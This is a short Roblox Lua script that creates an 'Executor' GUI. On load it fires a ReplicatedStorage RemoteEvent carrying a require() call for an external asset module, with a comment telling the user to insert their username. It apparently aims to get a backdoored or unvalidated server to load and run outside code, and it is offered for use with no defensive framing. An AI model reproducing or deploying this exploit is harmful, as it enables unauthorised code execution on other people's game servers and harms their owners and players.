-- Monstrum's Gui to Lua\n-- Version: 3.2 -- Instances: local Executor = Instance.new("ScreenGui") local TextBox = Instance.new("TextBox") --Properties: Executor.Name = "Executor" Executor.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") Executor.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Executor.ResetOnSpawn = false TextBox.Parent = Executor TextBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextBox.BackgroundTransparency = 1.000 TextBox.BorderColor3 = Color3.fromRGB(0, 0, 0) TextBox.BorderSizePixel = 0 TextBox.Position = UDim2.new(0.000910746807, 0, 0, 0) TextBox.Size = UDim2.new(0, -4, 0, 50) TextBox.ClearTextOnFocus = false TextBox.Font = Enum.Font.SourceSans TextBox.MultiLine = true TextBox.Text = "require(121425622240385).dominantultimate(\"dihminant\")" -- change this to your user TextBox.TextColor3 = Color3.fromRGB(0, 0, 0) TextBox.TextScaled = true TextBox.TextSize = 14.000 TextBox.TextWrapped = true -- Scripts: local function HZOUJT_script() -- Executor.LocalScript local script = Instance.new('LocalScript', Executor) game.ReplicatedStorage.RemoteEvent:FireServer(script.Parent.TextBox.Text) end coroutine.wrap(HZOUJT_script)()